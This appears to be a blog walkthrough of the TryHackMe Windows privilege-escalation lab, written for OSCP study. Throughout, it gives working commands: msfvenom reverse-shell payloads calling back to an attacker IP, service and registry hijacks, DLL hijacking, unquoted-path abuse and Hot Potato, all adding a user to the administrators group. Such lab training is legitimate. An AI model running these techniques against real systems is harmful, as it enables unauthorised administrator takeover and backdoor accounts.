Open in app

Sign in

Write

Sign in

Windows Priv Esc Arena walkthrough Try HackMe by TCM Security

Ashok Reddy Medikonda
12 min readOct 28, 2024

--

Hello. I’m Ashok. As part of my OSCP certification preparation, I'm doing the TryHackMe machine Windows PrivEsc TCM security Udemy course.

Takeouts from this blog

Today we see the walkthrough of Windows PrivEsc Arena in this box Escalation path Autorun, AlwaysInstallElevated, Registry, Executable Files, Startup applications, DLL Hijacking, BinPath, Unquoted Service Paths, Hot Potatos, Pawword Configurations files,

Windows PrivEsc Arena TryHackMe

Deploy the vulnerable machine

Note: IP Address of the machine might changes based avaliablity of THM

In order to connect the machine

Command — rdesktop 10.10.53.125 -g 95%

Select user open the popup, then user credentials — user/password321

Open Command Prompt,

Command — net user

net user

You find the new user other than the default user is TCM.

Registry Escalation — Autorun

This is SysInternal Utility has comprehensive knowledge of auto-starting location of the newly files, executables, drives, CDs show you what programs are configured to run during the system bootup which application preference for different users, Starting from Windows default applications to user installed 3 rd. party applications.

In Windows screen Win + R type cmd, it will open the command prompt.

C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe

It will for licence agreement, hit agree then it will open popup, like below check what are the applications running under auto run permission their app call program.exe under

Microsoft Corporation c:\program files\autorun program\program.exe

Autorun application

Check the permission with app accesschk64.exe in path C:\Program Files\Autorun Program

C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program"

The command will execute access check application -w for check for write permission, -v verbose information, -u suppress the errors

Autorun privileges

If observe the out containing RW Everyone, so we can replace the file with a malicious file and then execute to get a shell,

You can also check with

icacls "C:\Program Files\Autorun Program"
icacls permissions

Try with the PowerUp script,

Go to the PowerUp folder shift + RightClick then open command type below 3 commands

powershell.exe -exec bypass
Import-Module .\PowerUp.ps1
Invoke-AllChecks

It’s given path everyone write here

Powerup.ps1 Write-UserAddMSI

Try to create msfvenom payload using the name program.exe under path

“C:\Program Files\Autorun Program” since it will be in the auto run permissions to everyone.

msfvenom -p windows/shell_reverse_tcp LHOST=10.6.17.98 LPORT=443 -f exe -o program.exe

Options -p payload, LHOST local host in this case kali IP address, local port, -f format exe, -o for output name.

msfvenom payload

1. Start the python server

2. Open the Internet Explorer in Windows machine

3. Hit the IP address of kali machine in my case http://10.6.17.98/

4. Download the program file, click on save, not to run.

5. It will download in the downloads folder, Copy the file

6. Replace the file from the original location, “C:\Program Files\Autorun Program”

7. It will ask copy and Replace the existing click ok.

8. And the Windows target, Click on windows logo, Logoff section click one Disconnect.

9. Once login with Administrator privileges TCM/Hacker123

10. Start Netcat listen in the Kali machine to catch the shell

11. It will ask for the run the program, since it is aurorun permission click one run, you will shell.

#Kali
python3 -m http.server 80
rlwrap -nlvp 443

It will ask for file to run click ok

Popup to yes

We got a shell with TCM user

Got Administrator access.

Registry Escalation — AlwaysInstallElevated

“AlwaysInstallElevated” is a Windows Registry setting that affects the behavior of the Windows Installer service. The vulnerability arises when the “AlwaysInstallElevated” registry key is configured with a value of “1” in the Windows Registry.

reg query HKLM\Software\Policies\Microsoft\Windows\Installer

AlwaysInstallElevated ON means the 1 or 0x1 are same means AlwaysInstallElevated.

query to AlwaysInstallELevated

Now we can Abuse this,

powershell.exe -exec bypass
Import-Module .\PowerUp.ps1
Invoke-AllChecks

AlwaysInstallElevated registry Key, AbuseFunction: Write-UserAddMSI

PowerUp.ps1 Write-UserAddMSI

Before running the

Administrators are Administrator and TCM

checking administrator group users

Once you run the command

Write-UserAddMSI

It will take some time to window popup, use credentials, After running the popup to add user it will shown default credentials, Leave it like that.

After running the command net localgroup administrator, Now new administrator-created backdoor is added to the administrator group.

checking administrator group.

The user was successfully added to the administrator group.

Service Escalation — Registry

Service escalation dealing with registry, if have full control over the registry key, we can do compile malicious executable written c. in the add a user, in compile file and then done.

Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl

We have NT Authority\INTERACTIVE Allow FullControl access, it’s our permission.

Now we can compile the binary by adding user in the administrator group.

Download the c language file from this link, wget the link

cmd.exe /k net localgroup administrators user /add

It will add the current user to administrators group

Save the file and compile with using

x86_64-w64-mingw32-gcc windows_service.c -o x.exe
#If don’t have that use below command to install
sudo apt install gcc-mingw-w64

Compiled successfully, Download using python3 server.

Download the x.exe file and move temp file in Windows C drive

Before running the command let’s check administrators’ group has TCM, backdoor, and administrator.

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
sc start regsvc

Due some some issues I restarted the machine, for me above command is worked in cmd, when do it in the powershell command it’s failing make sure to try both.

We are now an administrator group, Revert the windows to try the next attack.

Service Escalation — Executable File

This technique, you can use whenever you have file with executable permission with full access we can try to check with 2 ways PowerUp.ps1, accesschk64.exe

One way is PowerUp.ps1

Powershell -ep bypass
. .\PowerUp.ps1
All-AllChecks

It will give a list of applications which one has executable with access permission.

In this case we have access to this path “C:\Program Files\File Permissions Service”

Another way is accesschk64.exe

This case should know which path has the full access permission, in real-time we don’t have that kind, Som better use PowerUp.ps1 then check this way.

accesschk64.exe -wvu “C:\Program Files\File Permissions Service”

Now you can see that RW Everyone with FILE_ALL_SYSTEM, let’s try to replace that executable with shell,

Now we can download the x.exe file and replace in the file filepermsvc.exe in that path of “C:\Program Files\File Permissions Service”.

I'm downloading the file using Kali Linux python3 service, downloading in Windows browser, then replacing the file

Downloaded from the browser, while saving select the path I wanted, click on the file then replace the file.

net localgroup administrators
sc start filepermsvc
net localgroup administrators

Before running sc start filepermsvc, I check that the administrators group, Only has TCM, Administrator.

After running sc start command user was also added into the admin group.

In this, if have doubt how do I know I need to filepermsvc, this is the service name that showed up in PowerUp.ps1 command Invoke-AllChecks.

Escalation Path — Startup Applications

Basically it will check, what applications have full permission, the same thing happens with run as command

icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

If you output notice that the “BUILTIN\Users” group has full access ‘(F)’ to the directory.

msfvenom -p windows/shell_reverse_tcp LHOST=10.6.17.98 LPORT=443 -f exe -o program.exe

I’m downloading the file using Kali Linux python3 service, downloading in Windows browser, then replacing the path “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”

Switch back disconnect and connect to TCM user we got the shell as TCM.

We got the TCM user administrator privileges

Escalation Path — DLL Hijacking

DLL hijacking occurs when an attacker tricks a legitimate Windows application into loading and executing a malicious DLL file instead of the intended legitimate DLL

This allows the attacker to run malicious code within the context of a trusted application.

· The attacker places a malicious DLL file in a location that will be searched before the legitimate DLL.

· When the application starts and attempts to load the DLL, it loads the malicious version first.

· This allows the malicious code to execute with the privileges of the target application

This GitHub link has all the scripts https://github.com/sagishahar/scripts

In this case I’m using windows_dll.c, placed this “cmd.exe /k net localgroup administrators user /add” in the file.

Login to Windows, tools section Process Monitor, open with administrator privileges, check these filters,

Search this way to find which executable application searching which requires .dll, if the DLL or application, has permission to replace then you will get administrator access.

You Might get about, how can access the process with administrator privileges, In this case, WINPREP machine is provided otherwise use our own Windows machine, this way just check for the name of .dll, then put the name in the target.

To check the name of the .dll messing with name not found

These are filtered .dll

Change data save the file, convert into .dll

x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll

Once you transmit to Windows, use the Kali Linux python3 server and download using the Windows browser.

sc stop dllsvc 
sc start dllsvc

After doing the command, user successfully added the user into the administrator group

Added user into administrator group.

Escalation Path — Binary Paths

It will gives list of Services in that we need particularly for this exercise Services Permissions in that we have daclsvc service name.

Powershell -ep bypass
. .\PowerUp.ps1
All-AllChecks

Here we can’t restart services like previous ones.

C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc daclsvc
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc Everyone *
Sc qc daclsvc

Everyone in this group, -u suppress errors, -w for read permission, -c for service name for this, -v verbose

We have permission to change the configuration.

We have Binary_path_home to “C:\Program Files\DACL Service\daclservice.exe” we can change configurations of the file.

the output suggests that the user “User-PC\User” has the “SERVICE_CHANGE_CONFIG” permission.

Let’s try something malicious, try what we can do with the binary path, Before starting the attack administrator group has TCM and administrator.

Commands

sc config daclsvc binpath= "net localgroup administrators user /add"
sc qc daclsvc
sc start daclsvc
net localgroup administrators

Lets breakdown

1. In the first command, we have configuration change permission so in the binary_home_path added command add the user into the administrators group.

2. Then check command path is correctly set or not with sc qc daclsvc

3. then start service with sc start daclsvc

4. Check user added to the administrators group or not.

Net localgroup administrators.

We added user to the administrators group.

Escalation Path — Unquoted Service Paths

Unquoted Service Path is a Windows Privilege Escalation vulnerability that occurs when the path to a service executable contains spaces and is not properly enclosed in quotations.

Using that we can check the permissions of the unquoted paths then if have the required permissions full permissions to the path then we possibly try that vulnerability.

#Look for Unquoted Service Paths permissions
Powershell -ep bypass
. .\PowerUp.ps1
All-AllChecks

In the image check for Unquoted Services paths forget about the AWSLiteAgent, Let’s go for unquotedsvc and it’s path

“C:\Progarm Files\Unquoted Path Service\Common Files\unquitedpathservice.exe”

The way it will search from the registry open Win+R -> type (regedit).

Computer/HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\unquotedsvc,

Windows search will work like this, Check how many spaces between that, possible try

C:\Progarm.exe
C:\Progarm Files.exe
C:\Progarm Files\Unquoted.exe
#and so on 
C:\Progarm Files\Unquoted Path Service\Common.exe
C:\Progarm Files\Unquoted Path Service\Common Files\unquitedpathservice.exe

Let’s create a netcat reverse shell using msfvenom

# This command  ran successful but user not added into admin group
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
# This command ran successful added user in admin group.
msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup administrators user /add" -f exe > Common.exe
#You can also try this to get shell, Personally I haven’t tried this.
msfvenom -p windows/exec CMD=’C:\Users\user\Desktop\nc.exe 10.6.17.98 443 -e cmd.exe’ -f exe-service -o common.exe

1. First in kali linux start the Python server, using the command python3 -m http.server 80

2. Then Open the browser in Windows, and type IP Address of Kali Linus tun0.

3. Download the file in “C:\Progarm Files\Unquoted Path Service\” in this section.

Download the Common.exe file, the Common Files folder.

Let's start the service.

Then run the sc start unquotedsvc, it will start the service our command is executed user will be added to the administrators group.

Escalation Path — Potato, Hot Potato

Hot Potato

Hot Potato was the original “potato” exploit, discovered by Stephen Breen in 2016.

It works on Windows 7, 8, 10, Server 2008, and Server 2012.

How Hot Potato Works:

· NBNS Spoofing: Exploits the Windows Name Resolution process to redirect traffic.

· Fake WPAD Proxy Server: Sets up a malicious Web Proxy Auto-Discovery (WPAD) configuration.

· NTLM Relay: Performs HTTP to SMB NTLM relay to create an elevated process.

https://github.com/Kevin-Robertson/Tater/tree/master

https://jlajara.gitlab.io/Potatoes_Windows_Privesc

https://github.com/foxglovesec/Potato/tree/master

Bypass the PowerShell permissions and Import the module Tater.ps1,

Powershell -ep bypass
Import-Module .\Tater.ps1
net localgroup administrators

Command to run the for tater.ps1

Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"
#It will take some time to add
net localgroup administrators

Successfully user added to the administrator group.

Escalation Path — Password Mining Escalation — Configuration Files

Password are stored in .txt, .config, .kdbx and .xml files

#Windows 
notepad C:\Windows\Panther\Unattend.xml
#kali
echo -n "cGFzc3dvcmQxMjM=" | base64 -d 
password123

We already know the password.

The remaining 2 escalations have already been completed in the Udemy course.

Thanks for reading the entire article, Until then good luck.

Please feel free to reach out to me Linkedin

Windows Priv Escalation
Tryhackme
Hackthebox
Windows Exploit
Tcm Security

--

--

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams